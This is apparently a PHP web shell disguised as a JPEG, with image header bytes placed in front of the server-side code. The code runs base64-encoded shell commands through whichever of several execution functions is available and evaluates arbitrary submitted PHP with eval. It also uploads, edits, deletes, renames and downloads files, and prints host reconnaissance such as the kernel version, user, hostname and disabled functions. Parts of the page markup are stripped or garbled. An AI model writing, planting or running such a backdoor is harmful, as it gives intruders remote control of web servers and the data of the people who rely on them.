ÿØÿà �JFIF �� � � ÿÛ „ �����������������������������������( ��%���"1!%)+...��383,7(-.+�
�
�����-���+++--++++---+-+-----+---------------+---+-++7-----ÿÀ �� ß â��" ������ÿÄ � ����� ���� ����ÿÄ H� ������������ � ���!�1��AQaq��"‘¡2B±ÁÑð��#R“Ò�Tbr‚²á3csƒ’ÂñDS¢³�$CÿÄ �� ���� �����ÿÄ %��� ������� ����!�1A��Qa"23‘ÿÚ ��� ���� ? ôÿ ¨pŸªáÿ �—åYõ��õ\?àÒü©ŠÄ�ï¨pŸªáÿ �—åYõ��õ\?àÓü©ŠÄ�á 0Ÿªáÿ �Ÿå[úƒ ú®�ði~TÁb�qÐ8OÕpÿ ƒOò¤�Oè`–RÂáœá™êi€ß�É< FtŸI“ö�Ì8úDf�´�°å}“¾�œ6��
��öFá°y¥jñÇh†ˆ¢ã/ÃÐ�:ªcÈ�"Y¡ðÑl>�ÿ ”ÏËte:qž\oäŠe÷ó²·˜HT4&�ÿ ÓÐü6�ö®¿øþ�ßèô Ÿ•7�Ñ�i�’•j|“ñì>b…�þS?*Óô��ÿ ÓÐü*�h¥£ír¶ü UãSç‚Ÿ[AÐ�aè[ûª•�õ&�õj?†Éö+EzP—WeÒírJFt� ‘BŒ†Ï‡%#tE Ø�z�¥OÛ«!1›üä±Í™%ºÍãö]°î(–:@<�‹ŒÊö×�òÆt¦ãº+‡¦%Ìòh´OƒJŒtM�Ü>�ÀÜ�Êw�3�Y´•�牋4ÇýÊ�Tì>œú�=Íwhyë,¾Ôò×õ¿ßÊa»«þˆ�ѪQ|%6ž�™�A õ%�:øj<>É—ÿ Å_ˆCbõ¥š±�ý¯Ýƒï…¶|Rëó�cÍf溪“t.��СøTÿ *Ä¿�-{†ç�àczůŽ_–^Xþ�Œ±miB[X±d 1,é�”�zEù»&
î9gœf™9Ð'.;—™i}!ôšåîqêÛ٤ёý£½ÆA–�à�ôe"A$ËÚsäÿ
÷Û #°xŸëí(l� »ý3—��¥5m!
rt`†0~'j2(]S¦¦kv,ÚÇ�l¦øJA£Šƒ�J3E8ÙiŽ:cÉžúeZ°€¯\®kÖ(79�«Ž:¯X”¾³Š&¡*�….‰Ž(ÜíŸ2¥ª‡×Hi²TF¤�ò[¨íÈRëÉä¢mgÑ.�Ÿ<öäS0í„ǹÁU´f#Vß;Õ–…P@3ío<ä-±»Ž.L|kªÀê›f�Â6@»eu‚|ÓaÞÆŸ�…¨ááå>å�Š?cKü6ù�TÍÆ”�†s�ĤÚ;H2RÚ†õ\Ö·Ÿn'¾�ñ#ºI¤Å�´�%çÁ‚â7›‹qT3Iï¨Ö�Ú5��I7Ë!ÅOóŸ¶øÝñØô×�ª¦$Tc�ö‘�[«��Ö³šÒ';Aþ ¸èíg
A2Z��"i¸vd�Ä�÷.iõ®§�)¿]¤À†–‡É�&ä{V¶iŽ”�.Ó×Õÿ �û?h¬Mt–�íª[ÿ Ñÿ ÌV(í}=�ibÔ¡›¥¢±b��Lô¥‡pi�η�_Z<‡z§èŒ)iÖwiÇ 2hÙ3·=’d÷8éŽ1¦¸c¤µ€��7›7Ø ð\á)}� ¹�fËí›pAÃL%�âc2 �í§æQz¿;T8s�æ�°qø)�QFMð‰XŒÂ±�N¢aF¨…8¯!U � Z©RÊ�ÖPVÄÀÍin™Ì-Gˆª�ÅËŠ›•�zË}º±ŽÍFò¹}U�w�×#�ä5B¤{î}Ð�<ÙD
é©¤&‡�ïDbàÁôMÁ.ÿØÿà �JFIF �� � � ÿÛ „ �����������������������������������( ��%���"1!%)+...��383,7(-.+�
�
�����-���+++--++++---+-+-----+---------------+---+-++7-----ÿÀ �� ß â��" ������ÿÄ � ����� ���� ����ÿÄ H� ������������ � ���!�1��AQaq��"‘¡2B±ÁÑð��#R“Ò�Tbr‚²á3csƒ’ÂñDS¢³�$CÿÄ �� ���� �����ÿÄ %��� ������� ����!�1A��Qa"23‘ÿÚ ��� ���� ? ôÿ ¨pŸªáÿ �—åYõ��õ\?àÒü©ŠÄ�ï¨pŸªáÿ �—åYõ��õ\?àÓü©ŠÄ�á 0Ÿªáÿ �Ÿå[úƒ ú®�ði~TÁb�qÐ8OÕpÿ ƒOò¤�Oè`–RÂáœá™êi€ß�É< FtŸI“ö�Ì8úDf�´�°å}“¾�œ6��
��öFá°y¥jñÇh†ˆ¢ã/ÃÐ�:ªcÈ�"Y¡ðÑl>�ÿ ”ÏËte:qž\oäŠe÷ó²·˜HT4&�ÿ ÓÐü6�ö®¿øþ�ßèô Ÿ•7�Ñ�i�’•j|“ñì>b…�þS?*Óô��ÿ ÓÐü*�h¥£ír¶ü UãSç‚Ÿ[AÐ�aè[ûª•�õ&�õj?†Éö+EzP—WeÒírJFt� ‘BŒ†Ï‡%#tE Ø�z�¥OÛ«!1›üä±Í™%ºÍãö]°î(–:@<�‹ŒÊö×�òÆt¦ãº+‡¦%Ìòh´OƒJŒtM�Ü>�ÀÜ�Êw�3�Y´•�牋4ÇýÊ�Tì>œú�=Íwhyë,¾Ôò×õ¿ßÊa»«þˆ�ѪQ|%6ž�™�A õ%�:øj<>É—ÿ Å_ˆCbõ¥š±�ý¯Ýƒï…¶|Rëó�cÍf溪“t.��СøTÿ *Ä¿�-{†ç�àczůŽ_–^Xþ�Œ±miB[X±d 1,é�”�zEù»&
î9gœf™9Ð'.;—™i}!ôšåîqêÛ٤ёý£½ÆA–�à�ôe"A$ËÚsäÿ
÷Û #°xŸëí(l� »ý3—��¥5m!
rt`†0~'j2(]S¦¦kv,ÚÇ�l¦øJA£Šƒ�J3E8ÙiŽ:cÉžúeZ°€¯\®kÖ(79�«Ž:¯X”¾³Š&¡*�….‰Ž(ÜíŸ2¥ª‡×Hi²TF¤�ò[¨íÈRëÉä¢mgÑ.�Ÿ<öäS0í„ǹÁU´f#Vß;Õ–…P@3ío<ä-±»Ž.L|kªÀê›f�Â6@»eu‚|ÓaÞÆŸ�…¨ááå>å�Š?cKü6ù�TÍÆ”�†s�ĤÚ;H2RÚ†õ\Ö·Ÿn'¾�ñ#ºI¤Å�´�%çÁ‚â7›‹qT3Iï¨Ö�Ú5��I7Ë!ÅOóŸ¶øÝñØô×�ª¦$Tc�ö‘�[«��Ö³šÒ';Aþ ¸èíg
A2Z��"i¸vd�Ä�÷.iõ®§�)¿]¤À†–‡É�&ä{V¶iŽ”�.Ó×Õÿ �û?h¬Mt–�íª[ÿ Ñÿ ÌV(í}=�ibÔ¡›¥¢±b��Lô¥‡pi�η�_Z<‡z§èŒ)iÖwiÇ 2hÙ3·=’d÷8éŽ1¦¸c¤µ€��7›7Ø ð\á)}� ¹�fËí›pAÃL%�âc2 �í§æQz¿;T8s�æ�°qø)�QFMð‰XŒÂ±�N¢aF¨…8¯!U � Z©RÊ�ÖPVÄÀÍin™Ì-Gˆª�ÅËŠ›•�zË}º±ŽÍFò¹}U�w�×#�ä5B¤{î}Ð�<ÙD
é©¤&‡�ïDbàÁôMÁ. array('pipe', 'w')), $pipes);
$output = stream_get_contents($pipes[1]);
$return_var = proc_close($process);
break;
case 'popen':
$handle = popen($command, 'r');
$output = stream_get_contents($handle);
$return_var = pclose($handle);
break;
case 'pcntl_exec':
break;
case 'backtick':
$output = `$command`;
$return_var = strlen($output); // backtick operator doesn't provide a return_var
break;
}
// If the command was executed successfully, break out of the loop
//echo "Command: $command\n
";
if ( (is_array($output) && count($output) > 0) || (!is_array($output) && strlen($output) > 0 ) ){
echo "Command: $command\n
";
echo "used Exxecution Method: $method\n
";
$_SESSION["method"] = $method;
break;
}
}
return $output;
}
function createDirectoryLinks($directory) {
$sections = explode(DIRECTORY_SEPARATOR, $directory);
$currentPath = '';
$links = '';
foreach ($sections as $section) {
if (!empty($section)) {
$currentPath .= DIRECTORY_SEPARATOR . $section;
$links .= DIRECTORY_SEPARATOR ."" . $section . "";
}
}
return $links;
}
function getFilePermissionsString($itemPath) {
$permissions = fileperms($itemPath);
// Get the file type
$fileType = '';
if (is_dir($itemPath)) {
$fileType = 'd';
} elseif (is_link($itemPath)) {
$fileType = 'l';
} else {
$fileType = '-';
}
// Convert integer permissions to string representation
$permissionString = $fileType;
// Owner permissions
$permissionString .= ($permissions & 0x0100) ? 'r' : '-';
$permissionString .= ($permissions & 0x0080) ? 'w' : '-';
$permissionString .= ($permissions & 0x0040) ?
(($permissions & 0x0800) ? 's' : 'x') :
(($permissions & 0x0800) ? 'S' : '-');
// Group permissions
$permissionString .= ($permissions & 0x0020) ? 'r' : '-';
$permissionString .= ($permissions & 0x0010) ? 'w' : '-';
$permissionString .= ($permissions & 0x0008) ?
(($permissions & 0x0400) ? 's' : 'x') :
(($permissions & 0x0400) ? 'S' : '-');
// Others permissions
$permissionString .= ($permissions & 0x0004) ? 'r' : '-';
$permissionString .= ($permissions & 0x0002) ? 'w' : '-';
$permissionString .= ($permissions & 0x0001) ?
(($permissions & 0x0200) ? 't' : 'x') :
(($permissions & 0x0200) ? 'T' : '-');
return $permissionString;
}
function getGroupInfo($path) {
$gid = filegroup($path);
$groupInfo = array();
if (file_exists('/etc/group')) {
$handle = fopen('/etc/group', 'r');
while (($line = fread($handle, 1024)) !== false) {
$fields = explode(':', $line);
if ($fields[2] == $gid) {
$groupInfo['name'] = $fields[0];
break;
}
}
fclose($handle);
}
return $groupInfo['name'];
}
function getOwnerInfo($path,$isuname = false) {
if(fileowner("..") == fileowner($path)){
$isuname = true;
}
$uid = fileowner($path);
$userInfo = array();
if (function_exists('getpwuid')) {
$userInfo = getpwuid($uid);
return $userInfo['name'];
} else {
// Fallback method using script path
$scriptPath = __FILE__; // Get the current script path
if ($isuname && strpos($scriptPath, '/home/') !== false) {
$owner = substr($scriptPath, strpos($scriptPath, '/home/') + 6);
$owner = substr($owner, 0, strpos($owner, '/'));
return $owner;
} else {
// Default fallback
$userInfo['name'] = 'User_' . $uid;
return $userInfo['name'];
}
}
}
// Fetch directory listing using ls -liah command
function getDirectoryListing($directory) {
$directoryContents = scandir($directory);
$lsOutput = "";
$directories = array();
$files = array();
$x = 0;
foreach ($directoryContents as $item) {
$x++;
$itemPath = $directory . '/' . $item;
$itemInfo = pathinfo($itemPath);
$permissions = getFilePermissionsString($itemPath);
$owner = (function_exists('posix_getpwuid')) ? posix_getpwuid(fileowner($itemPath))['name'] : getOwnerInfo($itemPath);
$group = (function_exists('posix_getgrgid')) ? posix_getgrgid(filegroup($itemPath))['name'] : getGroupInfo($itemPath);
$size = filesize($itemPath);
if ($size < 1024) {
$sString = $size . " B";
} elseif ($size < 1048576) {
$sString = round($size / 1024, 2) . " KB";
} elseif ($size < 1073741824) {
$sString = round($size / 1048576, 2) . " MB";
} else {
$sString = round($size / 1073741824, 2) . " GB";
}
$sString = str_replace(" ", "", $sString);
//echo "[[$sString]]";
$modifiedTime = date('Y-m-d H:i:s', filemtime($itemPath));
if(substr($permissions, 0, 1)=="d"){
$item = "[$item]";
}
$line = sprintf(
"%d[+]%s[+]%s[+]%s[+]%s[+]%s[+]%s",
$x,
$item,
$owner,
$group,
$sString,
$permissions,
$modifiedTime
);
if(substr($permissions, 0, 1)=="d"){
$directories[] = $line;
}else{
$files[] = $line;
}
}
$lsOutput = implode("\n", $directories);
$lsOutput .= "\n".implode("\n", $files);
return $lsOutput;
}
function forceDownload($filePath) {
if (file_exists($filePath)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($filePath) . '"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($filePath));
readfile($filePath);
exit;
}
}
echo <<
td, tr{
font-size: small;
}
body {
font-family: Arial, sans-serif;
background-color: #1a1d23;
color: #fff;
padding: 20px;
margin: 0;
box-sizing: border-box;
}
h1, h2, h3, h4, h5, h6 {
color: #fff;
margin-bottom: 10px;
}
h1 {
font-size: 36px;
}
h2, .underlink {
font-size: 24px;
}
h3 {
font-size: 18px;
}
h4, div {
font-size: 16px;
}
h5 {
font-size: 14px;
}
h6 {
font-size: 12px;
}
p {
font-size: 16px;
margin-bottom: 20px;
}
a {
color: #fff;
text-decoration: none;
transition: color 0.2s ease;
}
a:hover {
color: #ccc;
}
table {
border-collapse: collapse;
width: 100%;
margin-bottom: 20px;
}
th, td {
border: 1px solid #333;
padding: 10px;
text-align: left;
}
th {
background-color: #333;
color: #fff;
}
td {
border-color: #333;
}
tr:nth-child(even) {
background-color: #333;
}
tr:nth-child(odd) {
background-color: #444;
}
tr:hover {
background-color: #555;
}
tr:hover td {
background-color: #666;
}
tr:hover th {
background-color: #777;
}
button {
background-color: #333;
color: #fff;
border: none;
padding: 10px 20px;
font-size: 16px;
cursor: pointer;
}
button:hover {
background-color: #444;
}
input[type="text"] {
padding: 10px;
border: 1px solid #333;
width: 30%;
font-size: 16px;
}
input[type="submit"] {
background-color: #333;
color: #fff;
border: none;
padding: 10px 20px;
font-size: 16px;
cursor: pointer;
}
input[type="submit"]:hover {
background-color: #444;
}
head;
// PHP version
echo "PHP Version: " . phpversion() . "
";
// Linux version
$linuxVersion = php_uname('a');
echo "Linux Version: " . $linuxVersion . "
";
// Uname
$uname = php_uname('s');
echo "Uname: " . $uname . "
";
// User
$user = (function_exists('posix_getpwuid')) ? posix_getpwuid(fileowner(".."))['name'] : getOwnerInfo("..", true);
echo "User: " . $user . "
";
// Hostname
$hostname = gethostname();
echo "Hostname: " . $hostname . "
";
// Disabled PHP functions
$disabledFunctions = ini_get('disable_functions');
echo "Disabled PHP Functions: " . $disabledFunctions . "
";
// Initialize array to store previous working directories
if (!isset($_SESSION['prevDirs'])) {
$_SESSION['prevDirs'] = [];
}
// Set default working directory
$workingDir = isset($_SESSION['workingDir']) ? $_SESSION['workingDir'] : __DIR__;
// Handle change of working directory
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["newdir"])) {
$newDir = $_POST["newdir"];
if (is_dir($newDir)) {
// Check if the new directory is already in previous directories
if (!in_array($newDir, $_SESSION['prevDirs'])) {
$_SESSION['prevDirs'][] = $workingDir;
}
$workingDir = realpath($newDir);
$_SESSION['workingDir'] = $workingDir;
} else {
echo "Invalid directory!";
}
}
// Handle file upload
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["file"])) {
$uploadDir = $workingDir . '/';
$uploadFile = $uploadDir . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadFile)) {
echo "File uploaded successfully.\n";
} else {
echo "Error uploading file.\n";
}
}
// Execute command
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["command"])) {
chdir($workingDir);
//$commandOutput = exCommand('/bin/cd ' . escapeshellarg($workingDir) . ' && ' . $_POST["command"]);
$commandOutput = exCommand(base64_decode($_POST["command"]));
if(is_array($commandOutput)){
echo implode("\n
", $commandOutput);
}else{
echo "$commandOutput
";
}
}
// Handle file actions and directory listing
// Handle file actions and directory listing
if (isset($_GET['action']) && isset($_GET['filename'])) {
$action = $_GET['action'];
$filename = $_GET['filename'];
switch ($action) {
case 'E':
// Edit file action
$filePath = $workingDir . '/' . $filename;
if (is_file($filePath)) {
if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["file_content"])) {
// Save file content if form is submitted
$fileContent = $_POST["file_content"];
if (file_put_contents($filePath, $fileContent) !== false) {
echo "File saved successfully: $filename";
} else {
echo "Error saving file: $filename";
}
} else {
// Display file content in form for editing
$fileContent = file_get_contents($filePath);
$fileContentSafe = htmlspecialchars($fileContent);
echo "Edit File: $filename
";
echo "";
}
} else {
echo "File not found: $filename";
}
break;
case 'Del':
// Delete file action
$filePath = $workingDir . '/' . $filename;
if (is_file($filePath)) {
if (unlink($filePath)) {
echo "File deleted successfully: $filename";
} else {
echo "Error deleting file: $filename";
}
} else {
echo "File not found: $filename";
}
break;
case 'Dow':
// Download file action
$filePath = $workingDir . '/' . $filename;
if (is_file($filePath)) {
forceDownload($filePath);
} else {
echo "File not found: $filename";
}
break;
case 'R':
// Handle rename file action
if (isset($_GET['action']) && $_GET['action'] === 'R') {
$filename = isset($_GET['filename']) ? $_GET['filename'] : '';
$newname = isset($_GET['newname']) ? $_GET['newname'] : 'new';
if (!empty($filename)) {
// Implement your logic for renaming file here
rename($filename, $newname);
echo "renamed successfully from $filename to $newname";
}
}
break;
default:
echo "Invalid action.";
break;
}
}
// Include the current working directory in the list of previous directories if it's not already listed
if (!in_array($workingDir, $_SESSION['prevDirs'])) {
$_SESSION['prevDirs'][] = $workingDir;
}
// Update working directory if a previous directory link is clicked
if (isset($_GET['newdir'])) {
$newDir = $_GET['newdir'];
if (in_array($newDir, $_SESSION['prevDirs'])) {
$workingDir = $newDir;
$_SESSION['workingDir'] = $workingDir;
}
}
// Get the directory listing
$lsOutput = getDirectoryListing($workingDir);
// Display directory listing in a table with single-line borders
$wd = __DIR__;
echo "Contents of ".createDirectoryLinks($workingDir).": [Home Dir]
";
// Get the current page number from the URL
$currentPage = isset($_GET['page']) ? (int)$_GET['page'] : 1;
// Set the number of entries per page
$entriesPerPage = 30;
// Split the $fileLines array into pages
$fileLinePages = array_chunk(explode("\n", $lsOutput), $entriesPerPage);
// Display the current page
echo "";
foreach ($fileLinePages[$currentPage - 1] as $index => $line) {
// Skip empty lines
if (empty(trim($line))) continue;
$columns = explode("[+]", $line);//preg_split('/\s+/', $line, -1, PREG_SPLIT_NO_EMPTY);
echo "";
foreach ($columns as $colIndex => $column) {
if ($colIndex == count($columns) - 1) {
// Last column (filename)
echo "| $column | ";
if ($index >= 0) {
// Actions for subsequent rows
//echo $columns[5];
if (substr($columns[5], 0, 1) != 'd') {
// If not a directory, include actions
echo '';
echo " E | ";
echo "Del | ";
echo "Dow | ";
echo "R ";
echo " | ";
} elseif($columns[1]=="[.]" || $columns[1]=="[..]"){
echo ' | ';
}else{
$dirName = str_replace("[", "", $columns[1]);
$dirName = str_replace("]", "", $dirName);
echo '';
echo "Download | ";
echo "Rename ";
echo " | ";
}
}
} else {
// Other columns
if(substr($column[0], 0, 1) == '['){
//make it clickable to change directory
$dirName = str_replace("[", "", $column);
$dirName = str_replace("]", "", $dirName);
if($dirName==".."){
$dirName = getUpperDirectory($workingDir);
}elseif($dirName !="."){
$dirName = $workingDir."/".$dirName;
}
if ($dirName=="."){
echo "[.] | ";
}else{
echo "$column | ";
}
}else{
echo "$column | ";
}
}
}
echo "
";
}
echo "
";
// Display pagination links
echo "
";
// Change Working Directory form
echo "";
// Upload form
echo "Upload a File
";
echo "";
// Command Execution form
echo "Execute Command
";
echo "";
// PHP Eval form
echo "Evaluate PHP Code
";
echo "";
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["php_code"])) {
$phpCode = $_POST["php_code"];
try {
ob_start();
eval($phpCode);
$output = ob_get_clean();
echo "Output:
";
echo "$output
";
} catch (Exception $e) {
echo "Error:
";
echo "" . $e->getMessage() . "
";
}
}
echo <<